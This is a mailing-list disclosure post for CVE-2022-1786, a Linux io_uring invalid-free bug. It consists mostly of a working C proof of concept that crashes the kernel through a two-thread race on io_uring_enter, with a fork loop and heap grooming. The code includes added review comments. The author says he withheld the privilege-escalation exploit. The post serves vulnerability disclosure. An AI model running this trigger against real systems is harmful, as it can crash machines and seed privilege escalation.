oss-sec mailing list archives
Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring
From: Kyle Zeng <zengyhkyle () gmail com>
Date: Sat, 28 May 2022 01:26:27 -0700
Hi all,
A minimal crashing PoC for CVE-2022-1786 is attached to this email.
Kyle
=-=-=-=-=-=-=-=
#define _GNU_SOURCE
#include <stdarg.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <assert.h>
#include <fcntl.h>
#include <linux/fs.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/timerfd.h>
#include <sys/xattr.h>
#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/io_uring.h>
// io_uring tutorial:
/* Short integer aliases used throughout the file (plain text macros, not typedefs). */
#define u64 unsigned long long
#define u32 unsigned int
/* Fallback syscall numbers for io_uring, used only when the libc headers do not provide them. */
# ifndef __NR_io_uring_setup
# define __NR_io_uring_setup 425
# endif
# ifndef __NR_io_uring_enter
# define __NR_io_uring_enter 426
# endif
# ifndef __NR_io_uring_register
# define __NR_io_uring_register 427
# endif
/* io_uring file descriptor; set by trigger_free() from mgr.fd and read by func(). */
int fd_io_uring;
/* NOTE(review): GROOM_NUM is not referenced anywhere in the visible source. */
#define GROOM_NUM 0x20
/* NOTE(review): cpu_num is not referenced anywhere in the visible source. */
u64 cpu_num = 4;
/* Number of ring entries requested, files opened and SQEs filled in trigger_free(). */
u64 work_num = 0x200;
/* Path that trigger_free() opens work_num times. */
char fname[] = "/etc/passwd";
/* NOTE(review): heap_addr, target_shmid and timerfd_backup are not referenced in the visible source. */
u64 heap_addr;
int target_shmid;
char timerfd_backup[0x100];
/* NOTE(review): NAP_TIME1 / NAP_TIME2 are not referenced anywhere in the visible source. */
#define NAP_TIME1 50000
#define NAP_TIME2 50000
/*
 * Restrict the calling thread to a single CPU.
 *
 * cpuid: index of the CPU the caller should run on.
 *
 * The sched_setaffinity() call is deliberately made outside assert():
 * when the file is built with NDEBUG, assert() expands to nothing and a
 * call placed inside it would silently disappear.
 */
void set_cpu(int cpuid)
{
    cpu_set_t my_set;
    int ret;

    CPU_ZERO(&my_set);
    CPU_SET(cpuid, &my_set);

    /* A pid of 0 applies the mask to the calling thread. */
    ret = sched_setaffinity(0, sizeof(my_set), &my_set);
    assert(ret == 0);
    (void)ret; /* keeps the build warning-free when NDEBUG removes the assert */
}
/*
 * Raise the soft RLIMIT_NOFILE limit of this process to its hard limit
 * and print the hard limit.
 *
 * Aborts via assert() if the limit cannot be queried or changed.
 */
void increase_limit()
{
    int ret;
    struct rlimit open_file_limit;

    /* Query current soft/hard value */
    ret = getrlimit(RLIMIT_NOFILE, &open_file_limit);
    assert(ret >= 0);

    /*
     * rlim_t is an unsigned type that is wider than int on LP64 targets,
     * so it must not be printed with "%d"; widen explicitly and use %llu.
     */
    printf("[*] file limit: %llu\n",
           (unsigned long long)open_file_limit.rlim_max);

    /* Set soft limit to hard limit */
    open_file_limit.rlim_cur = open_file_limit.rlim_max;
    ret = setrlimit(RLIMIT_NOFILE, &open_file_limit);
    assert(ret >= 0);
    (void)ret; /* keeps the build warning-free when NDEBUG removes the asserts */
}
/*
 * Pointers into the mapped completion-queue ring.
 * Each field is filled in by uring_mgr_setup() as the ring mapping base
 * plus the matching offset from io_uring_params.cq_off.
 */
struct cq_ring_t {
u32 *head;
u32 *tail;
u32 *ring_mask;
u32 *ring_entries;
struct io_uring_cqe *cqes;
};
/*
 * Pointers into the mapped submission-queue ring.
 * Each field is filled in by uring_mgr_setup() as the ring mapping base
 * plus the matching offset from io_uring_params.sq_off.
 */
struct sq_ring_t {
u32 *head;
u32 *tail;
u32 *ring_mask;
u32 *ring_entries;
u32 *flags;
u32 *array;
};
/*
 * Everything uring_mgr_setup() produces for one io_uring instance:
 * the ring file descriptor, the SQ/CQ ring pointers and the mapped SQE array.
 */
struct uring_mgr_t {
int fd;
struct sq_ring_t sq_ring;
struct cq_ring_t cq_ring;
struct io_uring_sqe *sqes;
};
/*
 * Opcode values defined as macros after <linux/io_uring.h> has been included.
 * NOTE(review): presumably here so the file builds against headers that lack
 * these opcodes — confirm; the macros shadow any same-named enum constants.
 */
#define IORING_OP_WRITE 23
#define IORING_OP_READ 22
/* The single io_uring instance used by trigger_free(). */
struct uring_mgr_t mgr;
/*
 * Create an io_uring instance and map its rings into this process.
 *
 * mgr:     receives the ring fd, the SQ/CQ ring pointers and the SQE array.
 * entries: number of submission-queue entries requested from the kernel.
 *
 * The instance is created with IORING_SETUP_IOPOLL. Both rings are reached
 * through one mapping at IORING_OFF_SQ_RING, which is only valid when the
 * kernel reports IORING_FEAT_SINGLE_MMAP; that is asserted when the header
 * exposes the flag. Any failure aborts via assert().
 */
void uring_mgr_setup(struct uring_mgr_t *mgr, u32 entries)
{
    // create io_uring fd
    struct io_uring_params setup_params = {0};
    setup_params.flags = IORING_SETUP_IOPOLL;
    mgr->fd = syscall(__NR_io_uring_setup, entries, &setup_params);
    assert(mgr->fd >= 0);

#ifdef IORING_FEAT_SINGLE_MMAP
    // the CQ pointers below are derived from the SQ mapping, so the
    // kernel must back both rings with a single region
    assert(setup_params.features & IORING_FEAT_SINGLE_MMAP);
#endif

    // map the ring buffer and the SQE (submission queue entry) buffer;
    // sizes are kept in size_t so they are not truncated before mmap()
    size_t sq_ring_sz = setup_params.sq_off.array +
                        setup_params.sq_entries * sizeof(uint32_t);
    size_t cq_ring_sz = setup_params.cq_off.cqes +
                        setup_params.cq_entries * sizeof(struct io_uring_cqe);
    size_t ring_sz = sq_ring_sz > cq_ring_sz ? sq_ring_sz : cq_ring_sz;
    size_t sqes_sz = setup_params.sq_entries * sizeof(struct io_uring_sqe);

    void *ring_map = mmap(NULL, ring_sz, PROT_READ | PROT_WRITE,
                          MAP_SHARED | MAP_POPULATE,
                          mgr->fd, IORING_OFF_SQ_RING);
    // mmap() reports failure with MAP_FAILED, not NULL or a negative value
    assert(ring_map != MAP_FAILED);

    void *sqes_map = mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE,
                          MAP_SHARED | MAP_POPULATE,
                          mgr->fd, IORING_OFF_SQES);
    assert(sqes_map != MAP_FAILED);
    mgr->sqes = sqes_map;

    // byte-addressed base for applying the kernel-supplied offsets
    char *ring_ptr = ring_map;

    // now initialize the completion queue
    struct cq_ring_t *cq_ring = &mgr->cq_ring;
    cq_ring->head = (u32 *)(ring_ptr + setup_params.cq_off.head);
    cq_ring->tail = (u32 *)(ring_ptr + setup_params.cq_off.tail);
    cq_ring->ring_mask = (u32 *)(ring_ptr + setup_params.cq_off.ring_mask);
    cq_ring->ring_entries = (u32 *)(ring_ptr + setup_params.cq_off.ring_entries);
    cq_ring->cqes = (struct io_uring_cqe *)(ring_ptr + setup_params.cq_off.cqes);

    // now initialize the submission queue
    struct sq_ring_t *sq_ring = &mgr->sq_ring;
    sq_ring->head = (u32 *)(ring_ptr + setup_params.sq_off.head);
    sq_ring->tail = (u32 *)(ring_ptr + setup_params.sq_off.tail);
    sq_ring->ring_mask = (u32 *)(ring_ptr + setup_params.sq_off.ring_mask);
    sq_ring->ring_entries = (u32 *)(ring_ptr + setup_params.sq_off.ring_entries);
    sq_ring->flags = (u32 *)(ring_ptr + setup_params.sq_off.flags);
    sq_ring->array = (u32 *)(ring_ptr + setup_params.sq_off.array);
}
/*
 * Start signal: attempt() points this at a MAP_SHARED anonymous page,
 * func() spins until *flag is non-zero, trigger_free() sets it to 1.
 */
int *flag;
/* Completion counter: each func() thread atomically adds 1 when its syscall returns. */
u64 val;
/* trigger_free() polls the counter through this pointer until it reads 2. */
u64 *val_ptr = &val;
/* NOTE(review): elapse_time is not referenced anywhere in the visible source. */
u64 elapse_time[2];
/*
 * Thread body started twice by trigger_free().
 *
 * arg: the CPU index to pin to, passed as an integer stored in the pointer.
 *
 * Pins itself to that CPU, waits for *flag to become non-zero, issues one
 * io_uring_enter syscall on fd_io_uring and then bumps the global counter.
 *
 * NOTE(review): declared to return void * but has no return statement.
 * NOTE(review): *flag is read in a busy loop without volatile/atomic access,
 * so an optimising compiler is allowed to hoist the load out of the loop.
 */
void *func(void *arg) {
int cpuid = (int)(long)arg;
set_cpu(cpuid);
/* spin until trigger_free() releases both threads */
while(*flag == 0);
/*
 * Arguments after the fd: to_submit = work_num/2, min_complete = work_num/2,
 * flags = 1 (presumably IORING_ENTER_GETEVENTS — confirm against
 * <linux/io_uring.h>). The result in ret is not inspected.
 */
int ret = syscall(__NR_io_uring_enter, fd_io_uring, work_num/2,
work_num/2, 1);
/* tell trigger_free() that this thread's syscall has returned */
__atomic_fetch_add(&val, 1, __ATOMIC_SEQ_CST);
}
/*
 * Set up the ring, queue work_num read requests, then release two threads
 * that each call io_uring_enter on the same ring. Never returns: the
 * function ends in exit(0).
 *
 * Steps, in order:
 *   1. create the ring via uring_mgr_setup() and publish its fd;
 *   2. open fname work_num times;
 *   3. fill work_num SQEs, one per fd, all reading into the same buffer;
 *   4. advance the SQ tail to work_num;
 *   5. start two func() threads (CPU 0 and CPU 1), set *flag, wait for both.
 */
void trigger_free()
{
uring_mgr_setup(&mgr, work_num);
fd_io_uring = mgr.fd;
printf("fd_io_uring: %d\n", fd_io_uring);
// open some file
// fd = open("/etc/passwd", O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC);
/* NOTE(review): variable-length array of work_num ints on the stack. */
int fds[work_num];
puts(fname);
for(int i=0; i<work_num; i++) {
fds[i] = open(fname, O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC);
assert(fds[i] >= 0);
}
printf("fd: %d\n", fds[0]);
assert(fds[0] >= 0);
// SQE: submission queue entries
// struct io_uring_sqe sqe = {
// .opcode = IORING_OP_WRITE,
// .flags = 0,
// .ioprio = 0,
// .fd = fd,
// .off = 0,
// .addr = 0,
// .len = 1,
// };
/*
 * One 0x5000000-byte anonymous buffer, filled with 'A', is the destination
 * of every read request.
 * NOTE(review): the mmap() result is not checked before memset().
 */
void *buf = mmap(NULL, 0x5000000, PROT_READ|PROT_WRITE,
MAP_ANON|MAP_PRIVATE, -1, 0);
memset(buf, 'A', 0x5000000);
/* Template request; .fd is overwritten per entry in the loop below. */
struct io_uring_sqe sqe = {
.opcode = IORING_OP_READ,
.flags = 0,
.ioprio = 0,
.fd = -1,
.off = 0,
.addr = (u64)buf,
.len = 0x5000000,
};
// now submit the request
struct sq_ring_t *sq_ring = &mgr.sq_ring;
/* NOTE(review): cq_ring is assigned but not used afterwards in this function. */
struct cq_ring_t *cq_ring = &mgr.cq_ring;
u32 index, tail, next_tail;
next_tail = tail = *sq_ring->tail;
next_tail++;
// barrier();
// copy the request to the sqe buffer
index = tail & *mgr.sq_ring.ring_mask;
for(int i=0; i<work_num; i++) {
sqe.fd = fds[i];
memcpy(&mgr.sqes[index+i], &sqe, sizeof(struct io_uring_sqe));
}
/*
 * NOTE(review): only array[index] is written here, while the tail below is
 * set to work_num; the remaining array slots keep whatever the mapping
 * already contains.
 */
sq_ring->array[index] = index;
tail = next_tail;
/* checks that the shared tail has not already reached the old tail + 1 */
assert(*sq_ring->tail != tail);
*sq_ring->tail = work_num;
/* the coordinating thread moves to CPU 2; the workers pin to CPU 0 and 1 */
set_cpu(2);
pthread_t tids[2];
int ret;
for(int i=0; i<2; i++) {
/* NOTE(review): i is passed as the void * thread argument without a cast. */
ret = pthread_create(&tids[i], NULL, func, i);
assert(ret == 0);
}
/* release both workers */
*flag = 1;
// sleep(1);
/* busy-wait until both workers have returned from their syscall */
while(*val_ptr != 2);
pthread_join(tids[0], NULL);
pthread_join(tids[1], NULL);
// sleep(1000);
/*
 * NOTE(review): execve() of "/" with NULL argv/envp; its return value is
 * ignored and execution continues with close()/exit() if it fails.
 */
execve("/", NULL, NULL);
close(fd_io_uring);
exit(0);
}
/*
 * Run one attempt: allocate the shared start flag, run trigger_free() in a
 * forked child, and after that child has ended create 0x100 timerfds in the
 * parent.
 *
 * The child never returns from trigger_free() (it calls exit(0)); the
 * parent branch returns to the caller with the timerfds still open.
 * NOTE(review): fork() failure (-1) is treated like the parent branch.
 */
void attempt()
{
/* shared page so the flag stays visible across fork() */
flag = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANON, -1, 0);
if(!fork()) {
trigger_free();
} else {
wait(NULL);
/* the returned descriptors are not stored or closed */
for(int i=0; i<0x100; i++) timerfd_create(CLOCK_REALTIME, 0);
}
}
/*
 * Entry point: raise the fd limit, pin to CPU 0, then loop up to 10000
 * times, each time forking a child that calls attempt() while the parent
 * waits for it.
 *
 * NOTE(review): the child does not exit after attempt() returns, so it
 * falls back into this for loop and keeps iterating (and forking) itself
 * while the parent is still blocked in wait().
 */
int main() {
puts("========================================================================");
increase_limit();
set_cpu(0);
for(int i=0; i<10000; i++) {
printf("i: %d\n", i);
/* 10 ms pause between iterations */
usleep(10000);
if(!fork()) attempt();
else {
wait(NULL);
}
}
puts("Done");
}
=-=-=-=-=-=-=-=
On Tue, May 24, 2022 at 9:28 AM Kyle Zeng <zengyhkyle () gmail com> wrote:
A small correction, I shared a minimal crashing PoC to linux-distros but not the LPE exploit. I do not plan to share the LPE exploit because of ethical issues.
To answer your question: I intend to post the crashing PoC on May 27th. Thanks for reminding me.
Kyle

On Tue, May 24, 2022 at 9:22 AM Solar Designer <solar () openwall com> wrote:
> On Tue, May 24, 2022 at 09:10:37AM -0700, Kyle Zeng wrote:
> > # Impact
> > I wrote a proof-of-concept exploit and demonstrated that it can be used to achieve local privilege escalation.
>
> Since you shared the PoC exploit with linux-distros, you're supposed to also post that to oss-security within 7 days of your first posting above, so by or on May 31. Do you intend to, and when exactly?
>
> Alexander
Current thread:
- CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Solar Designer (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 28)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Solar Designer (May 24)
